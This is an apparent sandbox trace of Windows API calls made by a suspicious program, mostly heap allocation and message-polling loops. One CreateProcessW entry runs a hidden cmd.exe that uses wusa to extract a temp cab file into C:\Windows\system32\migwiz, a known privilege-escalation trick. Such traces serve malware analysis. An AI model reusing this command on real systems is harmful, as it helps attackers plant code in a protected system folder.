RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0133.731] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0133.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0133.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0133.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b0f98 [0133.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0133.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0133.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0133.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0133.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91c8 | out: hHeap=0x25c0000) returned 1 [0133.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91e0 | out: hHeap=0x25c0000) returned 1 [0133.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91b0 | out: hHeap=0x25c0000) returned 1 [0133.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9150 | out: hHeap=0x25c0000) returned 1 [0133.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0133.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9150 [0133.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0133.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91b0 [0133.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91e0 [0133.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0133.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91c8 [0133.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0133.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1058 [0133.743] CharUpperBuffW (in: lpsz="SW_HIDE", cchLength=0x7 | out: lpsz="SW_HIDE") returned 0x7 [0133.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f28 [0133.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8c88 [0133.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90f0 [0133.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8d90 [0133.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0133.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0133.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0133.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90f0 | out: hHeap=0x25c0000) returned 1 [0133.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0133.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0133.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91c8 | out: hHeap=0x25c0000) returned 1 [0133.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91e0 | out: hHeap=0x25c0000) returned 1 [0133.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91b0 | out: hHeap=0x25c0000) returned 1 [0133.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0133.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x106) returned 0x24207f0 [0133.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4a) returned 0x240a528 [0133.744] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /c wusa C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\64.cab /quiet /extract:C:\\Windows\\system32\\migwiz\\ & exit", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpStartupInfo=0x8bf838*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x8bf800 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /c wusa C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\64.cab /quiet /extract:C:\\Windows\\system32\\migwiz\\ & exit", lpProcessInformation=0x8bf800*(hProcess=0x168, hThread=0x160, dwProcessId=0xb24, dwThreadId=0xb28)) returned 1 [0133.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0133.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a528 | out: hHeap=0x25c0000) returned 1 [0133.758] CloseHandle (hObject=0x160) returned 1 [0133.758] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0133.758] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0133.758] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0133.758] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0133.758] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0133.758] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.758] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.354] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.354] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.365] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.365] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.379] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.379] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.394] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.394] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.410] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.410] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.426] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.426] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.441] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.441] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.457] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.457] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.472] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.472] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.488] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.488] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.504] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.504] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.519] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.519] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.535] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.535] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.550] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.550] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.566] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.566] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.582] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.582] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.597] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.597] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.614] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.614] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.628] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.628] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.644] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.644] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.660] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.660] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.675] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.675] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.691] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.691] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.706] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.706] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.727] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.727] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.738] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.738] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.753] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.753] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.769] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.769] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.784] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.784] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.800] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.800] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.815] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.816] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.831] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.831] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.847] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.847] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.863] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.863] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.878] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.878] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.894] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.894] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.909] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.909] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.925] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.925] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.940] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.940] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.956] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.956] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.971] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.972] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0134.987] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0134.987] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.005] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.005] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.018] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.018] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.034] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.034] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.050] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.050] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.065] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.065] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.081] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0135.081] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0135.081] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0135.081] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0135.081] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0135.081] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.081] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.096] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.096] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.112] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.112] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.127] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.128] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.143] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.143] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.159] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.159] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.174] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.174] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.190] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.190] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.205] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.206] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.221] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.221] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.237] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.237] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.252] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.252] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.268] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.268] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.284] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.284] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.299] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.299] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.315] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.315] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.333] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.333] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.354] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.354] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0135.361] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0135.361] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.154] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.154] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.158] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.158] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.174] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.174] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.422] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.422] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.462] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0136.462] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xa) returned 0x102 [0136.473] 